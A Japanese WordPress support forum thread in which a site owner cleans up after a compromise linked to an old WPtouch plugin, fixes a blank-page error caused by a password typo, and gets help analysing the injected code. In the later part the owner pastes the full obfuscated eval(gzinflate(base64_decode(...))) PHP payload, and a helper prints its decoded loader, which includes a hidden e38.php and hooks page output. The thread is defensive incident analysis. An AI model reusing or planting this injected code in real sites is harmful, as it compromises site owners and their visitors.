WPtouchはちょっと古いバージョンを使っていました。
多分、3月くらいの時点で最新だったバージョンです。
Web ArenaのPHPが5.1.6のため、プラグインも最新バージョンにしてしまうと、Wordpress全体がストップしてしまうことも少なくなくなってきてしまい、バージョンアップに待ったをかけてしまっていました。
現時点では、WPtouchも最新版にしました。
WordPressのユーザーのIDとパスワードも変更しました。
ftpのパスワードも変更しました。
そこまでは良かったんですが。
SQL DBのパスワードを変更。
wp-config.php
に新しいSQL DBのパスワードを書き入れて、HPの方を上書きしたら、サイト全体が停止してしまいました。
真っ白状態になってしまいました。
SQL DBのパスワードを変更。
wp-config.php
に新しいSQL DBのパスワードを書き入れて、HPの方を上書きしたら、サイト全体が停止してしまいました。
真っ白状態になってしまいました。
wp-config.phpに書かれている情報は、あくまでも接続時に利用する情報であって、そこを変更したからといって実際にmySQLへ接続する際に使うパスワードが変わるわけではありませんから当然です。
MySQLで使用するパスワードは、1)コマンドラインから変更する 2)phpMyAdminなどを使って変更する 3)レンタルサーバの場合はそれようにコントロールパネルなどの管理ツールが用意されている場合があるので、それを利用する 4)レンタルサーバ会社に依頼する のいずれかで、実際のパスワードを変更したうえで、wp-config.phpのパスワードも合わせて変更しなければいけませんよ。
chestnut_jpさん
1.phpMyAdminからSQLパスワードをAからB変更しました。
2.その変更したパスワードBに合わせて、wp-config.phpを変更。
ftpでwp-config.phpを上書き。
そうしたら、HPが完全に真っ白の状態になってしまいました。
やむを得ないので、一時的に
1.phpMyAdminからSQLパスワードを元のAに戻してみた。
phpMyAdminでAのパスワードで、SQLを操作できるのは確認済みです。
2.wp-config.phpをパスワードAに戻してftpしなおしてみた。
この状態でもまだ真っ白のままです。
お手数ばかりかけて申し訳ないです。
すみません。
単純なパスワードのミスでした。
本当に申し訳ないです。
chestnut_jpさん、色々ありがとうございます。
すみません。パスワードのミスで脱線してしまいました。
phpは644で問題なく動いていました。
プラグインやWordPressのバージョンアップは、Web ArenaでのPHPの5.2へのバージョンアップ予定が秋以降となっているようなので、必ずしも最新を追いかけられないかもしれません。
ですが、可能なかぎりで最新バージョンを使うようにします。
wp-content内ですが、これも中身はおかしなものがないかは確認してあります。
実質、JPEGが入っていたupload以外は総入れ替えで、引き継いだのはjpegだけですし。
JPEGもウイルスチェック等の確認はしました。
後はDBですが、朝からDBを目視で追ってみましたが、おかしなコードのようなものは入っていないように思います。
スペルミスの問題だったようで、よかったですね。
それよりも
1.phpMyAdminからSQLパスワードをAからB変更しました。
2.その変更したパスワードBに合わせて、wp-config.phpを変更。
ftpでwp-config.phpを上書き。
こういう場合、ローカル(自分のパソコン)でファイルを編集する際は、文字コードに注意が必要です。UTF-8(BOMなし)にしないと、それだけで真っ白になってしまうことがあります。
wp-config.phpファイルには設定上必要な情報が日本語で表記されていない(コメントは設定上必要な情報ではないので)からまだいいのですが、UTF-8で編集できるエディタを使わずにいろいろカスタマイズしていると、自分ではそれが原因とは気づかないので、ここに質問されても誰も答えられなくなることがありますから充分に注意してください。
原因が、悪質なコードが仕込まれていたらしいWPTouchバージョンによるものなのかどうかは、未だにはっきりはしませんが、今回の現象そのものは解決したようですね。
恐らく新たな展開にでもならない限り、これ以上わたしにアドバイスできることはなさそうです(^^)
大切なことを忘れていました。
> 4)eval(gzinflate(base64_decode(…. をデコードして、何が書かれていたか教えてください。
>
> 上記4)については、既に削除してしまったからわからないということであれば仕方ありませんが、実際には何が仕組まれてしまったのかを把握することも解決には不可欠な要素のひとつだと思います。
デコードはしてみたんですが、なんなのか分かりかねています。
仕込まれたコードをそのままここに書いても大丈夫でしょうか。
デコードしたものがリンクになっているなどして、ここに書いたら何らかの影響があるようならば、スクリーンショットで貼っていただくか、デコード前の「eval(gzinflate(base64_decode(…..」を全部教えてください。それがわかれば読んでいる方達も自分でデコードできますので。
chestnut_jpさん
お世話になります。
入れられていたコードは
<?php /*85a94d550af6dc824edff1886326b756*/ eval(gzinflate(base64_decode(‘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’)));?>
といったものです。
デコードしてみたところ、aeiicさんのサイトのものと思われるIPアドレスまで指定したスクリプトになっていました。
かなり巧妙ですね(;;)
WordPress用ディレクトリの中は削除されたとのことなので大丈夫とは思いますが、「virtual」というディレクトリが作られていたりはしませんか?
そのディレクトリの中にはサブディレクトリがいくつかあって、最終的には「info_img」の中にe38.phpというスクリプトが設置されていおり、これが起動する仕組みになっているようです。
e38.phpの中身までは知る由もありませんが、aeiicさんのサイト上だけでなく、閲覧者にも危害を及ぼす危険性はぬぐえない気がしますので、もう一度、WordPress用ディレクトリの中だけでなく、借りているディスクスペース内に不振なディレクトリやファイルがないかどうか、よく確認してみてください。
なお、かなり危ないことが仕組まれた可能性が高いので、どのテーマまたはプラグインにそのようなことが仕組まれているのかを、できれば突き止めたいものです。
念のため、デコードしたものを以下に載せておきます。
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/virtual/xxx.xxx.xxx.xxx/home/dnwmlroot/dnflash/ja/html/referMail/header/info_img/e38.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
※xxx.xxx.xxx.xxxの部分は、実際はIPアドレスです。
「ob_start」はWordPress固有の関数ではないので、何をするものかは「ob_start」でググってください。
chestnut_jpさん
ありがとうございます。
コードを仕込まれた当時の状態でもvirtualというフォルダーはありませんでした。
一応、WPを入れ直す前にftpで保存しておいたので、そちらも探してみましたがありませんでした。
現在のサーバーの他のディレクトリーもこちらで作った覚えのないフォルダー、ファイル等を探してみましたが、何も無いようです。
プラグインは、比較的何を入れていたか残っていると思うのですが。
中には、プラグインの有効化>PHPのバージョンが古くて、エラーメッセージも出ないまま真っ白>ftpで無理やりプラグイン削除といったことも何度かしているので。
必ずしも100%ではないかもしれません。
テーマは、何を入れていたか、探してみます。
原因が特定出来ればいいのですが。
間違っているかもしれませんが、問題の「e38.php」ですが、
ウェブサーバーのルートから見て
/dnwmlroot/dnflash/ja/html/referMail/header/info_img/e38.php
ではないでしょうか?
virtualディレクトリは見えないと思います。
検索してみたのですが、
/dnwmlroot/dnflash/ja/html/referMail/header/
というディレクトリは、「Denbun」というウェブメールが作るもののように思います。
http://www.denbun.com/ja/index.html
自身でインストールされたのでなければ、(e38.phpは別として)「Denbun」自体は、ホスティング側がインストールしたものかもしれません。
redcockerさん
chestnut_jpさん
e38.phpでも検索してみたんですけど。
これもありませんでした。
Denbunは、Web ArenaのWebメールで使われているようです。
あぁ、失礼しました。
$GLOBALS['mfsn']=
のところは絶対パスで書いてありましたね。
e38.phpでも検索してみたんですけど。
これもありませんでした。
恐らく「info_img」ディレクトリのパーミッションが書き込み可能になっていなかったため、e38.phpを埋め込むことができなかったのかもしれませんね。
やはり念のため、今回の事象はプロバイダに報告しておいたほうがいいかと思います。
WordPressとは直接関係のないWebメールに対して仕込まれそうになっていたのだとすると、ほかのユーザにも同じような危険は及ぶ可能性がありますし、実際被害に合っていたら、何がしかのメール(スパムメールとかウィルスメール)をばらまくところだったわけですから。
コードの中身はわかったものの、その原因となるものが何だったのかは依然として不明なので、aeiicさんがテーマを見つけてくださることを祈りつつ、また、わたしを含めほかの人達に同じことが起きないことを祈りつつ、本件について今度こそこれ以上アドバイスできることはなさそうです。
※今からでも可能なら、ほかの人たちへの注意の呼びかけの意味からも、件名を「ダッシュボードが表示できなくなってしまいました。」ではなく「eval(gzinflate(base64_decode(」が仕込まれる危険性について」とか、何か事象を暗示するものにするとかできたらいいですね。
